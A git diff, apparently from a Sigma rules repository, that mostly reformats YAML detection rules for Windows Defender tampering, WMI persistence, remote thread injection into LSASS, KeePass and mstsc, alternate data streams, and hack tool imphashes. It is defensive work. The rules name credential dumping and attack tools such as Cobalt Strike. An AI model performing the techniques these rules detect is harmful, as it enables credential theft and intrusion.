Defender\Scan\DisableScanningMappedNetworkDrivesForFullScan ' - '\Windows Defender\SpyNet\DisableBlockAtFirstSeen ' - '\Real-Time Protection\SpyNetReporting ' + # Exclusions changes are covered in 1321dc4e-a1fe-481d-a016-52c45f0c8b4f + # Exploit guard changes are covered in a3ab73f1-bd46-4319-8f06-4b20d0617886 condition: windefend and selection falsepositives: - Administrator activity (must be investigated) diff --git a/sigma/builtin/windefend/win_defender_tamper_protection_trigger.yml b/sigma/builtin/windefend/win_defender_tamper_protection_trigger.yml index 4c48694c3..a3fae24f3 100644 --- a/sigma/builtin/windefend/win_defender_tamper_protection_trigger.yml +++ b/sigma/builtin/windefend/win_defender_tamper_protection_trigger.yml @@ -1,8 +1,7 @@ title: Microsoft Defender Tamper Protection Trigger id: 49e5bc24-8b86-49f1-b743-535f332c2856 status: stable -description: Detects blocked attempts to change any of Defender's settings such as - "Real Time Monitoring" and "Behavior Monitoring" +description: Detects blocked attempts to change any of Defender's settings such as "Real Time Monitoring" and "Behavior Monitoring" references: - https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide @@ -19,7 +18,7 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 5013 + EventID: 5013 # Tamper protection blocked a change to Microsoft Defender Antivirus. If Tamper protection is enabled then, any attempt to change any of Defender's settings is blocked. Event ID 5013 is generated and states which setting change was blocked. Value|endswith: - \Windows Defender\DisableAntiSpyware - \Windows Defender\DisableAntiVirus @@ -31,7 +30,6 @@ detection: - \Real-Time Protection\DisableScriptScanning condition: windefend and selection falsepositives: - - Administrator might try to disable defender features during testing (must be - investigated) + - Administrator might try to disable defender features during testing (must be investigated) level: high ruletype: Sigma diff --git a/sigma/builtin/windefend/win_defender_threat.yml b/sigma/builtin/windefend/win_defender_threat.yml index 6b5271f18..23d8f9b9b 100644 --- a/sigma/builtin/windefend/win_defender_threat.yml +++ b/sigma/builtin/windefend/win_defender_threat.yml @@ -4,7 +4,7 @@ status: stable description: Detects actions taken by Windows Defender malware detection engines references: - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus -author: "J\xE1n Tren\u010Dansk\xFD" +author: Ján Trenčanský date: 2020/07/28 tags: - attack.execution @@ -17,10 +17,10 @@ detection: Channel: Microsoft-Windows-Windows Defender/Operational selection: EventID: - - 1006 - - 1015 - - 1116 - - 1117 + - 1006 # The antimalware engine found malware or other potentially unwanted software. + - 1015 # The antimalware platform detected suspicious behavior. + - 1116 # The antimalware platform detected malware or other potentially unwanted software. + - 1117 # he antimalware platform performed an action to protect your system from malware or other potentially unwanted software. condition: windefend and selection falsepositives: - Unlikely diff --git a/sigma/builtin/windefend/win_defender_virus_scan_disabled.yml b/sigma/builtin/windefend/win_defender_virus_scan_disabled.yml index bd5b6fc81..30f2a58c8 100644 --- a/sigma/builtin/windefend/win_defender_virus_scan_disabled.yml +++ b/sigma/builtin/windefend/win_defender_virus_scan_disabled.yml @@ -1,15 +1,15 @@ title: Windows Defender Virus Scanning Feature Disabled id: 686c0b4b-9dd3-4847-9077-d6c1bbe36fcb related: - - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 - type: obsoletes + - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62 + type: obsoletes status: stable description: Detects disabling of the Windows Defender virus scanning feature references: - https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5012 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/ -author: "J\xE1n Tren\u010Dansk\xFD, frack113" +author: Ján Trenčanský, frack113 date: 2020/07/28 modified: 2023/11/22 tags: @@ -22,7 +22,7 @@ detection: windefend: Channel: Microsoft-Windows-Windows Defender/Operational selection: - EventID: 5012 + EventID: 5012 # Scanning for viruses is disabled. condition: windefend and selection falsepositives: - Unknown diff --git a/sigma/builtin/wmi/win_wmi_persistence.yml b/sigma/builtin/wmi/win_wmi_persistence.yml index e46af204a..6f6dd3fa1 100644 --- a/sigma/builtin/wmi/win_wmi_persistence.yml +++ b/sigma/builtin/wmi/win_wmi_persistence.yml @@ -1,8 +1,7 @@ title: WMI Persistence id: 0b7889b4-5577-4521-a60a-3376ee7f9f7b status: test -description: Detects suspicious WMI event filter and command line event consumer based - on WMI and Security Logs. +description: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs. references: - https://twitter.com/mattifestation/status/899646620148539397 - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ @@ -16,8 +15,7 @@ tags: logsource: product: windows service: wmi - definition: WMI Namespaces Auditing and SACL should be configured, EventID 5861 - and 5859 detection requires Windows 10, 2012 and higher + definition: WMI Namespaces Auditing and SACL should be configured, EventID 5861 and 5859 detection requires Windows 10, 2012 and higher detection: wmi: Channel: Microsoft-Windows-WMI-Activity/Operational @@ -27,6 +25,7 @@ detection: - ActiveScriptEventConsumer - CommandLineEventConsumer - CommandLineTemplate + # - 'Binding EventFilter' # too many false positive with HP Health Driver wmi_filter_registration: EventID: 5859 filter_scmevent: @@ -34,8 +33,7 @@ detection: Query: select * from MSFT_SCMEventLogEvent User: S-1-5-32-544 PossibleCause: Permanent - condition: wmi and (( (wmi_filter_to_consumer_binding and consumer_keywords) or - (wmi_filter_registration) ) and not filter_scmevent) + condition: wmi and (( (wmi_filter_to_consumer_binding and consumer_keywords) or (wmi_filter_registration) ) and not filter_scmevent) falsepositives: - Unknown (data set is too small; further testing needed) level: medium diff --git a/sigma/sysmon/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml b/sigma/sysmon/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml index af873d039..edf01ddae 100644 --- a/sigma/sysmon/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml +++ b/sigma/sysmon/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml @@ -3,7 +3,7 @@ id: 2e4e488a-6164-4811-9ea1-f960c7359c40 status: test description: Detects remote thread creation from CACTUSTORCH as described in references. references: - - https://twitter.com/SBousseaden/status/1090588499517079552 + - https://twitter.com/SBousseaden/status/1090588499517079552 # Deleted - https://github.com/mdsecactivebreach/CACTUSTORCH author: '@SBousseaden (detection), Thomas Patzke (rule)' date: 2019/02/01 @@ -31,7 +31,7 @@ detection: - \winword.exe - \excel.exe TargetImage|contains: \SysWOW64\ - StartModule: null + StartModule: condition: create_remote_thread and selection falsepositives: - Unknown diff --git a/sigma/sysmon/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml b/sigma/sysmon/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml index 419b52f26..91ab38f51 100644 --- a/sigma/sysmon/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml +++ b/sigma/sysmon/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml @@ -1,8 +1,7 @@ title: HackTool - Potential CobaltStrike Process Injection id: 6309645e-122d-4c5b-bb2b-22e4f9c2fa42 status: test -description: Detects a potential remote threat creation with certain characteristics - which are typical for Cobalt Strike beacons +description: Detects a potential remote threat creation with certain characteristics which are typical for Cobalt Strike beacons references: - https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f - https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/ diff --git a/sigma/sysmon/create_remote_thread/create_remote_thread_win_keepass.yml b/sigma/sysmon/create_remote_thread/create_remote_thread_win_keepass.yml index acd84c973..5b3796de5 100644 --- a/sigma/sysmon/create_remote_thread/create_remote_thread_win_keepass.yml +++ b/sigma/sysmon/create_remote_thread/create_remote_thread_win_keepass.yml @@ -1,8 +1,7 @@ title: Remote Thread Created In KeePass.EXE id: 77564cc2-7382-438b-a7f6-395c2ae53b9a status: experimental -description: Detects remote thread creation in "KeePass.exe" which could indicates - potential password dumping activity +description: Detects remote thread creation in "KeePass.exe" which could indicates potential password dumping activity references: - https://www.cisa.gov/uscert/ncas/alerts/aa20-259a - https://github.com/denandz/KeeFarce diff --git a/sigma/sysmon/create_remote_thread/create_remote_thread_win_loadlibrary.yml b/sigma/sysmon/create_remote_thread/create_remote_thread_win_loadlibrary.yml index 2a124a42f..927878752 100644 --- a/sigma/sysmon/create_remote_thread/create_remote_thread_win_loadlibrary.yml +++ b/sigma/sysmon/create_remote_thread/create_remote_thread_win_loadlibrary.yml @@ -1,8 +1,7 @@ title: CreateRemoteThread API and LoadLibrary id: 052ec6f6-1adc-41e6-907a-f1c813478bee status: test -description: Detects potential use of CreateRemoteThread api and LoadLibrary function - to inject DLL into a process +description: Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process references: - https://threathunterplaybook.com/hunts/windows/180719-DLLProcessInjectionCreateRemoteThread/notebook.html author: Roberto Rodriguez @Cyb3rWard0g diff --git a/sigma/sysmon/create_remote_thread/create_remote_thread_win_mstsc_susp_location.yml b/sigma/sysmon/create_remote_thread/create_remote_thread_win_mstsc_susp_location.yml index e0305e49e..c01030681 100644 --- a/sigma/sysmon/create_remote_thread/create_remote_thread_win_mstsc_susp_location.yml +++ b/sigma/sysmon/create_remote_thread/create_remote_thread_win_mstsc_susp_location.yml @@ -1,13 +1,9 @@ title: Remote Thread Creation In Mstsc.Exe From Suspicious Location id: c0aac16a-b1e7-4330-bab0-3c27bb4987c7 status: experimental -description: 'Detects remote thread creation in the "mstsc.exe" process by a process - located in a potentially suspicious location. - - This technique is often used by attackers in order to hook some APIs used by DLLs - loaded by "mstsc.exe" during RDP authentications in order to steal credentials. - - ' +description: | + Detects remote thread creation in the "mstsc.exe" process by a process located in a potentially suspicious location. + This technique is often used by attackers in order to hook some APIs used by DLLs loaded by "mstsc.exe" during RDP authentications in order to steal credentials. references: - https://github.com/S12cybersecurity/RDPCredentialStealer/blob/1b8947cdd065a06c1b62e80967d3c7af895fcfed/APIHookInjectorBin/APIHookInjectorBin/Inject.h#L25 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/create_remote_thread/create_remote_thread_win_password_dumper_lsass.yml b/sigma/sysmon/create_remote_thread/create_remote_thread_win_password_dumper_lsass.yml index 1e80c75fc..913167aa9 100644 --- a/sigma/sysmon/create_remote_thread/create_remote_thread_win_password_dumper_lsass.yml +++ b/sigma/sysmon/create_remote_thread/create_remote_thread_win_password_dumper_lsass.yml @@ -1,13 +1,9 @@ title: Password Dumper Remote Thread in LSASS id: f239b326-2f41-4d6b-9dfa-c846a60ef505 status: stable -description: 'Detects password dumper activity by monitoring remote thread creation - EventID 8 in combination with the lsass.exe process as TargetImage. - - The process in field Process is the malicious program. A single execution can - lead to hundreds of events. - - ' +description: | + Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. + The process in field Process is the malicious program. A single execution can lead to hundreds of events. references: - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm author: Thomas Patzke diff --git a/sigma/sysmon/create_remote_thread/create_remote_thread_win_powershell_lsass.yml b/sigma/sysmon/create_remote_thread/create_remote_thread_win_powershell_lsass.yml index 0d2abbaca..4a56509c1 100644 --- a/sigma/sysmon/create_remote_thread/create_remote_thread_win_powershell_lsass.yml +++ b/sigma/sysmon/create_remote_thread/create_remote_thread_win_powershell_lsass.yml @@ -1,10 +1,10 @@ title: Potential Credential Dumping Attempt Via PowerShell Remote Thread id: fb656378-f909-47c1-8747-278bf09f4f4f related: - - id: 3f07b9d1-2082-4c56-9277-613a621983cc - type: obsoletes - - id: 0f920ebe-7aea-4c54-b202-9aa0c609cfe5 - type: similar + - id: 3f07b9d1-2082-4c56-9277-613a621983cc + type: obsoletes + - id: 0f920ebe-7aea-4c54-b202-9aa0c609cfe5 + type: similar status: test description: Detects remote thread creation by PowerShell processes into "lsass.exe" references: diff --git a/sigma/sysmon/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml b/sigma/sysmon/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml index 93ad96f47..1ba5cae18 100644 --- a/sigma/sysmon/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml +++ b/sigma/sysmon/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml @@ -1,11 +1,10 @@ title: Remote Thread Creation Via PowerShell In Potentially Suspicious Target id: 99b97608-3e21-4bfe-8217-2a127c396a0e related: - - id: eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50 - type: similar + - id: eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50 + type: similar status: experimental -description: Detects the creation of a remote thread from a Powershell process in - a potentially suspicious target process +description: Detects the creation of a remote thread from a Powershell process in a potentially suspicious target process references: - https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html author: Florian Roth (Nextron Systems) @@ -29,6 +28,7 @@ detection: - \powershell.exe - \pwsh.exe TargetImage|endswith: + # Note: Please add additonal potential interesting targets to increase coverage - \rundll32.exe - \regsvr32.exe condition: create_remote_thread and selection diff --git a/sigma/sysmon/create_remote_thread/create_remote_thread_win_uncommon_source_image.yml b/sigma/sysmon/create_remote_thread/create_remote_thread_win_uncommon_source_image.yml index 608990a48..560ec73ba 100644 --- a/sigma/sysmon/create_remote_thread/create_remote_thread_win_uncommon_source_image.yml +++ b/sigma/sysmon/create_remote_thread/create_remote_thread_win_uncommon_source_image.yml @@ -34,6 +34,7 @@ detection: - \find.exe - \findstr.exe - \forfiles.exe + # - '\git.exe' - \gpupdate.exe - \hh.exe - \iexplore.exe @@ -41,7 +42,7 @@ detection: - \lync.exe - \makecab.exe - \mDNSResponder.exe - - \monitoringhost.exe + - \monitoringhost.exe # Loads .NET CLR by default and thus a favorite for process injection for .NET in-memory offensive tools. - \msbuild.exe - \mshta.exe - \msiexec.exe @@ -58,6 +59,7 @@ detection: - \schtasks.exe - \smartscreen.exe - \spoolsv.exe + # - '\taskhost.exe' # disabled due to false positives - \tstheme.exe - \userinit.exe - \vssadmin.exe @@ -71,10 +73,10 @@ detection: filter_main_winlogon_1: SourceImage|endswith: :\Windows\System32\winlogon.exe TargetImage|endswith: - - :\Windows\System32\services.exe - - :\Windows\System32\wininit.exe - - :\Windows\System32\csrss.exe - - :\Windows\System32\LogonUI.exe + - :\Windows\System32\services.exe # happens on Windows 7 + - :\Windows\System32\wininit.exe # happens on Windows 7 + - :\Windows\System32\csrss.exe # multiple OS + - :\Windows\System32\LogonUI.exe # multiple OS filter_main_winlogon_2: SourceImage: C:\Windows\System32\winlogon.exe TargetParentProcessId: 4 @@ -93,17 +95,18 @@ detection: filter_main_system: TargetImage: System filter_main_msiexec: + # Note: MSI installers will trigger this SourceImage|endswith: \msiexec.exe TargetImage|contains: - \AppData\Local\ - :\Program Files (x86)\ - :\Program Files\ filter_optional_powerpnt: + # Raised by the following issue: https://github.com/SigmaHQ/sigma/issues/2479 SourceImage|contains: \Microsoft Office\ SourceImage|endswith: \POWERPNT.EXE TargetImage|endswith: :\Windows\System32\csrss.exe - condition: create_remote_thread and (selection and not 1 of filter_main_* and - not 1 of filter_optional_*) + condition: create_remote_thread and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/create_remote_thread/create_remote_thread_win_uncommon_target_image.yml b/sigma/sysmon/create_remote_thread/create_remote_thread_win_uncommon_target_image.yml index 5a37c6846..bd2b1d4bd 100644 --- a/sigma/sysmon/create_remote_thread/create_remote_thread_win_uncommon_target_image.yml +++ b/sigma/sysmon/create_remote_thread/create_remote_thread_win_uncommon_target_image.yml @@ -1,8 +1,8 @@ title: Remote Thread Creation In Uncommon Target Image id: a1a144b7-5c9b-4853-a559-2172be8d4a03 related: - - id: f016c716-754a-467f-a39e-63c06f773987 - type: obsoletes + - id: f016c716-754a-467f-a39e-63c06f773987 + type: obsoletes status: experimental description: Detects uncommon target processes for remote thread creation references: @@ -56,8 +56,7 @@ detection: filter_optional_winzip: SourceImage|endswith: :\Program Files\WinZip\FAHWindow64.exe TargetImage|endswith: :\Windows\explorer.exe - condition: create_remote_thread and (selection and not 1 of filter_main_* and - not 1 of filter_optional_*) + condition: create_remote_thread and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/create_stream_hash/create_stream_hash_ads_executable.yml b/sigma/sysmon/create_stream_hash/create_stream_hash_ads_executable.yml index 0f85ed2bd..06e6a116a 100644 --- a/sigma/sysmon/create_stream_hash/create_stream_hash_ads_executable.yml +++ b/sigma/sysmon/create_stream_hash/create_stream_hash_ads_executable.yml @@ -1,8 +1,7 @@ title: Hidden Executable In NTFS Alternate Data Stream id: b69888d4-380c-45ce-9cf9-d9ce46e67821 status: test -description: Detects the creation of an ADS (Alternate Data Stream) that contains - an executable by looking at a non-empty Imphash +description: Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash references: - https://twitter.com/0xrawsec/status/1002478725605273600?s=21 author: Florian Roth (Nextron Systems), @0xrawsec @@ -27,8 +26,6 @@ detection: Hash|contains: IMPHASH=00000000000000000000000000000000 condition: create_stream_hash and (selection and not 1 of filter_main_*) falsepositives: - - This rule isn't looking for any particular binary characteristics. As legitimate - installers and programs were seen embedding hidden binaries in their ADS. - Some false positives are expected from browser processes and similar. + - This rule isn't looking for any particular binary characteristics. As legitimate installers and programs were seen embedding hidden binaries in their ADS. Some false positives are expected from browser processes and similar. level: medium ruletype: Sigma diff --git a/sigma/sysmon/create_stream_hash/create_stream_hash_creation_internet_file.yml b/sigma/sysmon/create_stream_hash/create_stream_hash_creation_internet_file.yml index e48b6690a..12fb6095d 100644 --- a/sigma/sysmon/create_stream_hash/create_stream_hash_creation_internet_file.yml +++ b/sigma/sysmon/create_stream_hash/create_stream_hash_creation_internet_file.yml @@ -1,8 +1,7 @@ title: Creation Of a Suspicious ADS File Outside a Browser Download id: 573df571-a223-43bc-846e-3f98da481eca status: experimental -description: Detects the creation of a suspicious ADS (Alternate Data Stream) file - by software other than browsers +description: Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers references: - https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/ author: frack113 @@ -55,11 +54,11 @@ detection: filter_optional_maxthon: Image|endswith: \maxthon.exe filter_optional_edge_1: - - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ - - Image|endswith: \WindowsApps\MicrosoftEdge.exe - - Image: - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - - C:\Program Files\Microsoft\Edge\Application\msedge.exe + - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ + - Image|endswith: \WindowsApps\MicrosoftEdge.exe + - Image: + - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe + - C:\Program Files\Microsoft\Edge\Application\msedge.exe filter_optional_edge_2: Image|startswith: - C:\Program Files (x86)\Microsoft\EdgeCore\ @@ -88,7 +87,6 @@ detection: condition: create_stream_hash and (selection and not 1 of filter_optional_*) falsepositives: - Other legitimate browsers not currently included in the filter (please add them) - - Legitimate downloads via scripting or command-line tools (Investigate to determine - if it's legitimate) + - Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate) level: medium ruletype: Sigma diff --git a/sigma/sysmon/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml b/sigma/sysmon/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml index 9ef9112d7..1921f4268 100644 --- a/sigma/sysmon/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml +++ b/sigma/sysmon/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml @@ -1,11 +1,10 @@ title: Suspicious File Download From File Sharing Websites id: 52182dfb-afb7-41db-b4bc-5336cb29b464 related: - - id: ae02ed70-11aa-4a22-b397-c0d0e8f6ea99 - type: similar + - id: ae02ed70-11aa-4a22-b397-c0d0e8f6ea99 + type: similar status: experimental -description: Detects the download of suspicious file type from a well-known file and - paste sharing domain +description: Detects the download of suspicious file type from a well-known file and paste sharing domain references: - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015 - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a @@ -27,7 +26,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_domain: Contents|contains: - - .githubusercontent.com + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ diff --git a/sigma/sysmon/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml b/sigma/sysmon/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml index efa8c55cb..27b90d8ef 100644 --- a/sigma/sysmon/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml +++ b/sigma/sysmon/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml @@ -1,11 +1,10 @@ title: Unusual File Download From File Sharing Websites id: ae02ed70-11aa-4a22-b397-c0d0e8f6ea99 related: - - id: 52182dfb-afb7-41db-b4bc-5336cb29b464 - type: similar + - id: 52182dfb-afb7-41db-b4bc-5336cb29b464 + type: similar status: experimental -description: Detects the download of suspicious file type from a well-known file and - paste sharing domain +description: Detects the download of suspicious file type from a well-known file and paste sharing domain references: - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015 - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a @@ -26,7 +25,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_domain: Contents|contains: - - .githubusercontent.com + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ diff --git a/sigma/sysmon/create_stream_hash/create_stream_hash_hktl_generic_download.yml b/sigma/sysmon/create_stream_hash/create_stream_hash_hktl_generic_download.yml index 709254600..451b6541e 100644 --- a/sigma/sysmon/create_stream_hash/create_stream_hash_hktl_generic_download.yml +++ b/sigma/sysmon/create_stream_hash/create_stream_hash_hktl_generic_download.yml @@ -1,8 +1,7 @@ title: HackTool Named File Stream Created id: 19b041f6-e583-40dc-b842-d6fa8011493f status: experimental -description: Detects the creation of a named file stream with the imphash of a well-known - hack tool +description: Detects the creation of a named file stream with the imphash of a well-known hack tool references: - https://github.com/gentilkiwi/mimikatz - https://github.com/topotam/PetitPotam @@ -32,212 +31,212 @@ detection: EventID: 15 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Imphash: - - bcca3c247b619dcd13c8cdff5f123932 - - 3a19059bd7688cb88e70005f18efc439 - - bf6223a49e45d99094406777eb6004ba - - 0c106686a31bfe2ba931ae1cf6e9dbc6 - - 0d1447d4b3259b3c2a1d4cfb7ece13c3 - - 1b0369a1e06271833f78ffa70ffb4eaf - - 4c1b52a19748428e51b14c278d0f58e3 - - 4d927a711f77d62cebd4f322cb57ec6f - - 66ee036df5fc1004d9ed5e9a94a1086a - - 672b13f4a0b6f27d29065123fe882dfc - - 6bbd59cea665c4afcc2814c1327ec91f - - 725bb81dc24214f6ecacc0cfb36ad30d - - 9528a0e91e28fbb88ad433feabca2456 - - 9da6d5d77be11712527dcab86df449a3 - - a6e01bc1ab89f8d91d9eab72032aae88 - - b24c5eddaea4fe50c6a96a2a133521e4 - - d21bbc50dcc169d7b4d0f01962793154 - - fcc251cceae90d22c392215cc9a2d5d6 - - 23867a89c2b8fc733be6cf5ef902f2d1 - - a37ff327f8d48e8a4d2f757e1b6e70bc - - f9a28c458284584a93b14216308d31bd - - 6118619783fc175bc7ebecff0769b46e - - 959a83047e80ab68b368fdb3f4c6e4ea - - 563233bfa169acc7892451f71ad5850a - - 87575cb7a0e0700eb37f2e3668671a08 - - 13f08707f759af6003837a150a371ba1 - - 1781f06048a7e58b323f0b9259be798b - - 233f85f2d4bc9d6521a6caae11a1e7f5 - - 24af2584cbf4d60bbe5c6d1b31b3be6d - - 632969ddf6dbf4e0f53424b75e4b91f2 - - 713c29b396b907ed71a72482759ed757 - - 749a7bb1f0b4c4455949c0b2bf7f9e9f - - 8628b2608957a6b0c6330ac3de28ce2e - - 8b114550386e31895dfab371e741123d - - 94cb940a1a6b65bed4d5a8f849ce9793 - - 9d68781980370e00e0bd939ee5e6c141 - - b18a1401ff8f444056d29450fbc0a6ce - - cb567f9498452721d77a451374955f5f - - 730073214094cd328547bf1f72289752 - - 17b461a082950fc6332228572138b80c - - dc25ee78e2ef4d36faa0badf1e7461c9 - - 819b19d53ca6736448f9325a85736792 - - 829da329ce140d873b4a8bde2cbfaa7e - - c547f2e66061a8dffb6f5a3ff63c0a74 - - 0588081ab0e63ba785938467e1b10cca - - 0d9ec08bac6c07d9987dfd0f1506587c - - bc129092b71c89b4d4c8cdf8ea590b29 - - 4da924cf622d039d58bce71cdf05d242 - - e7a3a5c377e2d29324093377d7db1c66 - - 9a9dbec5c62f0380b4fa5fd31deffedf - - af8a3976ad71e5d5fdfb67ddb8dadfce - - 0c477898bbf137bbd6f2a54e3b805ff4 - - 0ca9f02b537bcea20d4ea5eb1a9fe338 - - 3ab3655e5a14d4eefc547f4781bf7f9e - - e6f9d5152da699934b30daab206471f6 - - 3ad59991ccf1d67339b319b15a41b35d - - ffdd59e0318b85a3e480874d9796d872 - - 0cf479628d7cc1ea25ec7998a92f5051 - - 07a2d4dcbd6cb2c6a45e6b101f0b6d51 - - d6d0f80386e1380d05cb78e871bc72b1 - - 38d9e015591bbfd4929e0d0f47fa0055 - - 0e2216679ca6e1094d63322e3412d650 - - ada161bf41b8e5e9132858cb54cab5fb - - 2a1bc4913cd5ecb0434df07cb675b798 - - 11083e75553baae21dc89ce8f9a195e4 - - a23d29c9e566f2fa8ffbb79267f5df80 - - 4a07f944a83e8a7c2525efa35dd30e2f - - 767637c23bb42cd5d7397cf58b0be688 - - 14c4e4c72ba075e9069ee67f39188ad8 - - 3c782813d4afce07bbfc5a9772acdbdc - - 7d010c6bb6a3726f327f7e239166d127 - - 89159ba4dd04e4ce5559f132a9964eb3 - - 6f33f4a5fc42b8cec7314947bd13f30f - - 5834ed4291bdeb928270428ebbaf7604 - - 5a8a8a43f25485e7ee1b201edcbc7a38 - - dc7d30b90b2d8abf664fbed2b1b59894 - - 41923ea1f824fe63ea5beb84db7a3e74 - - 3de09703c8e79ed2ca3f01074719906b - - a53a02b997935fd8eedcb5f7abab9b9f - - e96a73c7bf33a464c510ede582318bf2 - - 32089b8851bbf8bc2d014e9f37288c83 - - 09D278F9DE118EF09163C6140255C690 - - 03866661686829d806989e2fc5a72606 - - e57401fbdadcd4571ff385ab82bd5d6d - - 84B763C45C0E4A3E7CA5548C710DB4EE - - 19584675d94829987952432e018d5056 - - 330768a4f172e10acb6287b87289d83b - - 885c99ccfbe77d1cbfcb9c4e7c1a3313 - - 22a22bc9e4e0d2f189f1ea01748816ac - - 7fa30e6bb7e8e8a69155636e50bf1b28 - - 96df3a3731912449521f6f8d183279b1 - - 7e6cf3ff4576581271ac8a313b2aab46 - - 51791678f351c03a0eb4e2a7b05c6e17 - - 25ce42b079282632708fc846129e98a5 - - 021bcca20ba3381b11bdde26b4e62f20 - - 59223b5f52d8799d38e0754855cbdf42 - - 81e75d8f1d276c156653d3d8813e4a43 - - 17244e8b6b8227e57fe709ccad421420 - - 5b76da3acdedc8a5cdf23a798b5936b4 - - cb2b65bb77d995cc1c0e5df1c860133c - - 40445337761d80cf465136fafb1f63e6 - - 8a790f401b29fa87bc1e56f7272b3aa6 - - Hash|contains: - - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 - - IMPHASH=3A19059BD7688CB88E70005F18EFC439 - - IMPHASH=bf6223a49e45d99094406777eb6004ba - - IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6 - - IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3 - - IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF - - IMPHASH=4C1B52A19748428E51B14C278D0F58E3 - - IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F - - IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A - - IMPHASH=672B13F4A0B6F27D29065123FE882DFC - - IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F - - IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D - - IMPHASH=9528A0E91E28FBB88AD433FEABCA2456 - - IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3 - - IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88 - - IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4 - - IMPHASH=D21BBC50DCC169D7B4D0F01962793154 - - IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6 - - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 - - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC - - IMPHASH=F9A28C458284584A93B14216308D31BD - - IMPHASH=6118619783FC175BC7EBECFF0769B46E - - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA - - IMPHASH=563233BFA169ACC7892451F71AD5850A - - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 - - IMPHASH=13F08707F759AF6003837A150A371BA1 - - IMPHASH=1781F06048A7E58B323F0B9259BE798B - - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 - - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D - - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 - - 